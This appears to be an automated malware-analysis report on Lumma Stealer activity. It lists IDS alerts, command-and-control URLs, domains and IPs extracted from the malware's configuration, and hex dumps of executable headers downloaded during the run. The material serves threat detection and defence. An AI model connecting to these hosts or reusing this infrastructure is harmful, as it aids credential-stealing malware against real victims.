Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50076 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50076 -> 188.114.96.3:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 36
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:15 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 1f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 74 6f 6b 71 65 6f 73 00 a0 29 00 00 a0 00 00 00 98 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 71 74 6e 74 68 6d 70 00 20 00 00 00 40 2a 00 00 04 00 00 00 d2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:22 GMTContent-Type: application/octet-streamContent-Length: 1968128Last-Modified: Thu, 31 Oct 2024 23:36:29 GMTConnection: keep-aliveETag: "6724147d-1e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 20 4e 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4e 00 00 04 00 00 8f dc 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 0a 4e 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 0a 4e 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2c 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6f 64 6b 73 63 63 62 00 f0 1a 00 00 20 33 00 00 ec 1a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 65 6f 6a 71 62 6b 7a 00 10 00 00 00 10 4e 00 00 04 00 00 00 e2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4e 00 00 22 00 00 00 e6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:43 GMTContent-Type: application/octet-streamContent-Length: 2955264Last-Modified: Thu, 31 Oct 2024 23:36:09 GMTConnection: keep-aliveETag: "67241469-2d1800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 20 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 30 00 00 04 00 00 e9 49 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 6b 74 78 65 77 65 6b 00 60 2a 00 00 b0 05 00 00 5e 2a 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6c 76 6a 78 79 72 63 00 10 00 00 00 10 30 00 00 04 00 00 00 f2 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 30 00 00 22 00 00 00 f6 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:38:53 GMTContent-Type: application/octet-streamContent-Length: 2123776Last-Modified: Thu, 31 Oct 2024 23:36:22 GMTConnection: keep-aliveETag: "67241476-206800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 30 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 72 00 00 04 00 00 98 54 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6f 7a 79 78 71 68 77 00 c0 19 00 00 60 58 00 00 b6 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6e 73 64 63 66 6a 75 00 10 00 00 00 20 72 00 00 06 00 00 00 40 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 72 00 00 22 00 00 00 46 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:02 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 31 Oct 2024 22:59:44 GMTConnection: keep-aliveETag: "67240be0-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 0b 24 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 0c 46 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:05 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 1f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 74 6f 6b 71 65 6f 73 00 a0 29 00 00 a0 00 00 00 98 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 71 74 6e 74 68 6d 70 00 20 00 00 00 40 2a 00 00 04 00 00 00 d2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 23:39:05 GMTContent-Type: application/octet-streamContent-Length: 2750464Last-Modified: Thu, 31 Oct 2024 23:00:11 GMTConnection: keep-aliveETag: "67240bfb-29f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 1f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 74 6f 6b 71 65 6f 73 00 a0 29 00 00 a0 00 00 00 98 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 71 74 6e 74 68 6d 70 00 20 00 00 00 40 2a 00 00 04 00 00 00 d2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 